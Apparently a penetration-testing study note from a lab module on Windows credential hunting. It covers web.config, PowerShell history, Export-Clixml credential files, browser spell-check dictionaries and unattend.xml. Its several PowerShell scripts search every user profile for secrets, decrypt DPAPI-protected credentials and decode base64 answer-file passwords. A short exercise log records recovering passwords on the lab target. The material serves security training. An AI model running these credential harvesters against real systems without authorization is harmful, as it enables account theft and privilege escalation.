# App Config Files
- Despite best practice, apps often store creds in cleartext config files
- As one example, sensitive IIS information such as database connection strings or service-account credentials may be stored in a `web.config` file
- The default IIS webroot is `C:\inetpub\wwwroot`, so the first file to check is `C:\inetpub\wwwroot\web.config`; individual applications may carry their own `web.config` in subfolders
- The `findstr` one-liner below searches recursively (`/S`), case-insensitively (`/I`) and prints only the names of matching files (`/M`) for the literal string `password` (`/C:`); run it from the directory you want to search, e.g. after `cd C:\inetpub`
```powershell
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
```
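The `findstr` one-liner only tells you which files mention a password. The script below is an added example (not from the original page) that goes one step further: it reports the file, line number and matching line for a broader set of secret-looking keys, and parses the `<connectionStrings>` block of an ASP.NET `web.config` into user/password pairs. The `web.config` it runs against is constructed inline for the demo; the search roots and extension list are assumptions to tune for the target.

```powershell
# Added example (not from the original page): hunt credential-looking strings
# in config files and pull connection strings out of a web.config.
# The sample web.config below is constructed for the demo; search roots and
# extensions are assumptions you should tune to the target.

function Find-ConfigCredentials {
    param(
        [string[]]$Roots = @('C:\inetpub', 'C:\ProgramData', 'C:\Users', 'C:\xampp'),
        [string[]]$Extensions = @('*.txt', '*.ini', '*.cfg', '*.config', '*.xml', '*.json', '*.ps1', '*.bat'),
        # Keys that commonly carry secrets; Select-String is case-insensitive by default
        [string]$Pattern = 'pass(word|wd)?\s*[=:>]|pwd\s*=|connectionString|secret|apikey'
    )
    Get-ChildItem -Path $Roots -Include $Extensions -Recurse -File -Force -ErrorAction SilentlyContinue |
        Select-String -Pattern $Pattern -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                File = $_.Path
                Line = $_.LineNumber
                Hit  = $_.Line.Trim()
            }
        }
}

# Parse connection strings from an ASP.NET web.config and split out the
# embedded user/password pair instead of returning only the raw string.
function Get-WebConfigConnectionStrings {
    param([Parameter(Mandatory)][string]$Path)
    [xml]$cfg = Get-Content -Path $Path -Raw
    foreach ($cs in $cfg.configuration.connectionStrings.add) {
        $user = $pass = $null
        # Typical SQL Server keys: "User ID=...;Password=..." (or "uid=...;pwd=...")
        if ($cs.connectionString -match '(?i)(user id|uid)\s*=\s*([^;]+)')  { $user = $Matches[2] }
        if ($cs.connectionString -match '(?i)(password|pwd)\s*=\s*([^;]+)') { $pass = $Matches[2] }
        [pscustomobject]@{ Name = $cs.name; User = $user; Password = $pass; Raw = $cs.connectionString }
    }
}

# --- Demo on a constructed web.config so both functions can be exercised offline ---
$demoDir = Join-Path $env:TEMP 'cfghunt-demo'
New-Item -ItemType Directory -Path $demoDir -Force | Out-Null
@'
<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="AppDb" connectionString="Server=SQL01;Database=app;User ID=app_svc;Password=Summer2024!" providerName="System.Data.SqlClient" />
  </connectionStrings>
</configuration>
'@ | Set-Content -Path (Join-Path $demoDir 'web.config')

Find-ConfigCredentials -Roots $demoDir | Format-Table -AutoSize
Get-WebConfigConnectionStrings -Path (Join-Path $demoDir 'web.config') | Format-List
```

On a real target, call `Find-ConfigCredentials` with no arguments (or with the webroot and app folders you found during enumeration) and feed any `web.config` it flags into `Get-WebConfigConnectionStrings`.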
---
# PowerShell History File
- Starting with PowerShell 5.0 on Windows 10, the PSReadLine module saves the console command history to the following file (one file per user, persisted across sessions):
```txt
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```
- However, the path can be changed, so we can confirm it with the following
```powershell
(Get-PSReadLineOption).HistorySavePath
```
- Now that we know the history file's path, we can attempt to read its contents with `gc`
```powershell
gc (Get-PSReadLineOption).HistorySavePath
```
- We can also use the one-liner below to retrieve the contents of all PowerShell history files that the current user is able to access (profiles we cannot read are skipped silently)
```powershell
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
```
---
# PowerShell Creds
- PowerShell credential objects (`PSCredential`) are often used for scripting and automation tasks as a convenient way to store a username and password, typically saved to disk with `Export-Clixml`
- The password is serialised as a `SecureString` protected with [DPAPI](https://en.wikipedia.org/wiki/Data_Protection_API) in user scope, which typically means it can only be decrypted by the same user on the same computer it was created on
- Below is an example script, `Connect-VC.ps1`, that a sysadmin created to connect to a vCenter server easily
```powershell
# Connect-VC.ps1
# Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml'
$encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
$decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword
```
- If we have command execution as the sysadmin, or the ability to abuse DPAPI to recover that user's master key, then we can recover the cleartext creds from `pass.xml`, which is referenced in `Connect-VC.ps1` above; `GetNetworkCredential()` converts the `SecureString` back to plaintext
```powershell
$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
$credential.GetNetworkCredential().username   # bob
$credential.GetNetworkCredential().password   # PASSWORD
```
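Manually importing one known file works when you already know where it is. The script below is an added example (not from the original page) that finds `Export-Clixml` credential files by their serialised `PSCredential` type tag and tries to decrypt each one, reporting the DPAPI failure you get when running as a different user or on another host (`Key not valid for use in specified state`) instead of hiding it, because the encrypted blob is still worth keeping for offline master-key attacks. The search roots are assumptions; the credential file in the demo is constructed. Windows only, since `Export-Clixml` relies on DPAPI.

```powershell
# Added example (not from the original page): locate XML files written by
# Export-Clixml for a PSCredential and try to recover the password.
# Import-Clixml decrypts the SecureString with the calling user's DPAPI master
# key, so a different user (or host) fails with "Key not valid for use in
# specified state"; that outcome is reported per file, with the username still
# extracted from the CliXML, rather than swallowed.
# Search roots are assumptions; the demo credential file is constructed.

function Find-ClixmlCredentials {
    param([string[]]$Roots = @('C:\scripts', 'C:\Users', 'C:\ProgramData'))
    Get-ChildItem -Path $Roots -Include *.xml, *.clixml, *.cred -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object {
            # Only files serialised from a PSCredential carry this type name
            Select-String -LiteralPath $_.FullName -Pattern 'System\.Management\.Automation\.PSCredential' -Quiet
        } |
        ForEach-Object {
            $file = $_.FullName   # capture now: inside catch, $_ is the error record
            try {
                $cred = Import-Clixml -LiteralPath $file -ErrorAction Stop
                [pscustomobject]@{
                    File     = $file
                    UserName = $cred.UserName
                    Password = $cred.GetNetworkCredential().Password
                    Status   = 'decrypted'
                }
            } catch {
                # DPAPI refused: still harvest the username from the CliXML <S N="UserName"> node
                $name = Select-String -LiteralPath $file -Pattern '<S N="UserName">([^<]+)</S>' |
                        ForEach-Object { $_.Matches[0].Groups[1].Value }
                [pscustomobject]@{
                    File     = $file
                    UserName = $name
                    Password = $null
                    Status   = "failed: $($_.Exception.Message)"
                }
            }
        }
}

# --- Demo: create a credential file the way the sysadmin's script did, then hunt it ---
$demo = Join-Path $env:TEMP 'clixml-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
$secure = ConvertTo-SecureString 'Winter2024!' -AsPlainText -Force
[pscredential]::new('bob', $secure) | Export-Clixml -Path (Join-Path $demo 'pass.xml')
Find-ClixmlCredentials -Roots $demo | Format-List
```

Run as the user who created the file, the demo prints `Status: decrypted` with the password; copy `pass.xml` to another account and the same call returns the username with a `failed:` status, which tells you the blob needs that user's DPAPI master key.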
---
# Dictionary Files
- Spell-check custom dictionaries store every word a user chose to "add to dictionary", so sensitive information typed into an email client or a browser-based application (including passwords flagged as misspellings) can end up there
- Below is an example that checks the Chrome custom dictionary of the `htb-student` user for the string `password`
```powershell
gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
```
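The history and dictionary checks above are each a one-liner against one user. The script below is an added example (not from the original page) that serves both sections: it walks every profile under `C:\Users` the current user can read, reports history lines that mention credential-carrying commands or keywords, and separately lists dictionary words that are shaped like passwords even when no keyword is present. The Edge dictionary path is assumed to mirror Chrome's layout, and the keyword regex is a starting point to tune, not an exhaustive list.

```powershell
# Added example (not from the original page): read the PSReadLine history and
# the browser custom-dictionary file of every profile under C:\Users that the
# current user can open, and report lines that look credential-bearing.
# The Edge dictionary path is assumed to mirror Chrome's; the keyword regex is
# an assumption to tune.

$ArtifactPaths = @(
    'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
    'AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt'
    'AppData\Local\Microsoft\Edge\User Data\Default\Custom Dictionary.txt'   # assumed Edge equivalent
)

# Commands and words that tend to carry a secret on the same line
$CredPattern = 'pass(word|wd)?|pwd|secret|ConvertTo-SecureString|-Credential|net use|runas|cmdkey|psexec|token|apikey'

function Get-UserArtifactHits {
    param(
        [string]$UsersRoot = 'C:\Users',
        [string[]]$RelativePaths = $ArtifactPaths,
        [string]$Pattern = $CredPattern
    )
    foreach ($userDir in Get-ChildItem -Path $UsersRoot -Directory -ErrorAction SilentlyContinue) {
        foreach ($rel in $RelativePaths) {
            $file = Join-Path $userDir.FullName $rel
            # Other users' profiles are normally access-denied; skip them quietly
            $lines = Get-Content -LiteralPath $file -ErrorAction SilentlyContinue
            if (-not $lines) { continue }
            $n = 0
            foreach ($line in $lines) {
                $n++
                if ($line -match $Pattern) {
                    [pscustomobject]@{ User = $userDir.Name; File = Split-Path $file -Leaf; Line = $n; Text = $line.Trim() }
                }
            }
        }
    }
}

# Custom dictionaries hold one word per line, so any token shaped like a
# password (8+ chars mixing letters with digits or symbols) is worth a look
# even with no keyword. Chrome ends the file with a "checksum_v1 = ..." line.
function Get-DictionaryCandidates {
    param([string]$UsersRoot = 'C:\Users')
    $dictPaths = $ArtifactPaths | Where-Object { $_ -like '*Custom Dictionary.txt' }
    foreach ($userDir in Get-ChildItem -Path $UsersRoot -Directory -ErrorAction SilentlyContinue) {
        foreach ($rel in $dictPaths) {
            Get-Content -LiteralPath (Join-Path $userDir.FullName $rel) -ErrorAction SilentlyContinue |
                Where-Object { $_ -notmatch '^checksum' -and $_ -match '^(?=.*[A-Za-z])(?=.*[\d\W]).{8,}$' } |
                ForEach-Object { [pscustomobject]@{ User = $userDir.Name; Word = $_ } }
        }
    }
}

Get-UserArtifactHits | Format-Table -AutoSize
Get-DictionaryCandidates | Format-Table -AutoSize
```

Note that your own session's commands are appended to your history file as you type them, so run the hunt early or filter out your own profile when reading the output.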
---
# Unattended Installation Files
- Unattended installation files (`unattend.xml`, `sysprep.xml`) may define auto-logon settings or additional local accounts to be created as part of the installation
- Although Setup is supposed to delete these files (or blank out their sensitive values) once installation completes, sysadmins may have left copies in other folders while developing the image; common leftover locations include `C:\unattend.xml`, `C:\Windows\Panther\Unattend.xml`, `C:\Windows\Panther\Unattend\Unattend.xml` and `C:\Windows\System32\Sysprep\sysprep.xml`
- Passwords in `unattend.xml` are stored either in plaintext (`<PlainText>true</PlainText>`) or base64-encoded, which is an encoding rather than encryption and is trivially reversed, as in the example below
```xml
<!-- unattend.xml -->
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="specialize">
    <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <AutoLogon>
        <Password>
          <Value>local_4dmin_p@ss</Value>
          <PlainText>true</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <LogonCount>2</LogonCount>
        <Username>Administrator</Username>
      </AutoLogon>
      <ComputerName>*</ComputerName>
    </component>
  </settings>
```
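Reading one `AutoLogon` block by eye is easy; a real answer file can carry several passwords across several passes. The script below is an added example (not from the original page) that parses an `unattend.xml`, collects `AutoLogon`, `AdministratorPassword` and `LocalAccount` passwords, and decodes the base64 form Windows Setup writes when `PlainText` is `false` (the UTF-16LE password with a fixed suffix appended: `Password` for AutoLogon and LocalAccount entries, `AdministratorPassword` for the administrator password). The sample document is constructed for the demo, and the path list in `Find-UnattendFiles` covers common locations rather than every possible one.

```powershell
# Added example (not from the original page): parse an unattend.xml and
# recover every password it carries. When <PlainText>false</PlainText>,
# Windows Setup stores base64 of the UTF-16LE password with a fixed suffix
# appended ("Password" for AutoLogon and LocalAccount entries,
# "AdministratorPassword" for UserAccounts/AdministratorPassword).
# The sample document is constructed; the file list in Find-UnattendFiles is
# a set of common locations, not an exhaustive one.

function ConvertFrom-UnattendPassword {
    param(
        [Parameter(Mandatory)][string]$Value,
        [string]$PlainText = 'true',
        [string]$Suffix = 'Password'
    )
    # Anything other than an explicit "false" means the value is already cleartext
    if ($PlainText -ne 'false') { return $Value }
    $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Value))
    # Strip the suffix Setup appends before encoding; return as-is if it is absent
    if ($decoded.EndsWith($Suffix)) { $decoded.Substring(0, $decoded.Length - $Suffix.Length) } else { $decoded }
}

function Get-UnattendPasswords {
    param([Parameter(Mandatory)][xml]$Xml, [string]$Source = '<inline>')
    # Dot navigation ignores the default namespace, so no namespace manager is needed
    foreach ($s in $Xml.unattend.settings) {
        foreach ($c in $s.component) {
            $al = $c.AutoLogon
            if ($al.Password.Value) {
                [pscustomobject]@{ Source = $Source; Pass = $s.pass; Kind = 'AutoLogon'; Account = $al.Username
                    Password = ConvertFrom-UnattendPassword $al.Password.Value $al.Password.PlainText }
            }
            $ap = $c.UserAccounts.AdministratorPassword
            if ($ap.Value) {
                [pscustomobject]@{ Source = $Source; Pass = $s.pass; Kind = 'AdministratorPassword'; Account = 'Administrator'
                    Password = ConvertFrom-UnattendPassword $ap.Value $ap.PlainText 'AdministratorPassword' }
            }
            foreach ($la in $c.UserAccounts.LocalAccounts.LocalAccount) {
                if ($la.Password.Value) {
                    [pscustomobject]@{ Source = $Source; Pass = $s.pass; Kind = 'LocalAccount'; Account = $la.Name
                        Password = ConvertFrom-UnattendPassword $la.Password.Value $la.Password.PlainText }
                }
            }
        }
    }
}

function Find-UnattendFiles {
    $candidates = 'C:\unattend.xml', 'C:\Windows\Panther\Unattend.xml', 'C:\Windows\Panther\Unattend\Unattend.xml',
                  'C:\Windows\Panther\Unattended.xml', 'C:\Windows\System32\Sysprep\unattend.xml', 'C:\Windows\System32\Sysprep\sysprep.xml'
    foreach ($p in $candidates) {
        if (Test-Path -LiteralPath $p) {
            Get-UnattendPasswords -Xml ([xml](Get-Content -LiteralPath $p -Raw)) -Source $p
        }
    }
}

# --- Demo: the AutoLogon block from above plus a base64-hidden local account ---
# Build the hidden value the same way Setup does, so the decoder has something real to undo
$hidden = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Svc-P@ss1' + 'Password'))
[xml]$doc = @"
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="specialize">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>local_4dmin_p@ss</Value><PlainText>true</PlainText></Password>
        <Enabled>true</Enabled><Username>Administrator</Username>
      </AutoLogon>
    </component>
  </settings>
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount><Name>svc_deploy</Name><Password><Value>$hidden</Value><PlainText>false</PlainText></Password></LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"@
Get-UnattendPasswords -Xml $doc | Format-Table -AutoSize
Find-UnattendFiles | Format-Table -AutoSize
```

The demo returns `local_4dmin_p@ss` for the `Administrator` auto-logon and `Svc-P@ss1` for `svc_deploy`; on a target, `Find-UnattendFiles` alone is usually enough, with `Get-UnattendPasswords` reserved for copies found in non-standard folders.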
---
# Exercise
## initial enum
- `ping` test ![[images/Pasted image 20260222204752.png]]
- `nmap` scan ![[images/Pasted image 20260222204836.png]]
- `rdp` into target with given creds
- light internal enum ![[images/Pasted image 20260222204858.png]]
## `htb-student` user
- search for files containing `password` > none ![[images/Pasted image 20260222204928.png]]
- search chrome dictionary file ![[images/Pasted image 20260222205105.png]]
- read powershell history ![[images/Pasted image 20260222205322.png]]
- read for all accessible users > same
- try searching for files containing `password` under `c:\users` ![[images/Pasted image 20260222205831.png]]
- `\users\public\documents\settings.xml` looks interesting
- here we see a password for `proxyadmin`
## `bob` user
- list `\scripts` dir ![[images/Pasted image 20260222210439.png]]
- try to decrypt `pass.xml` ![[images/Pasted image 20260222210559.png]]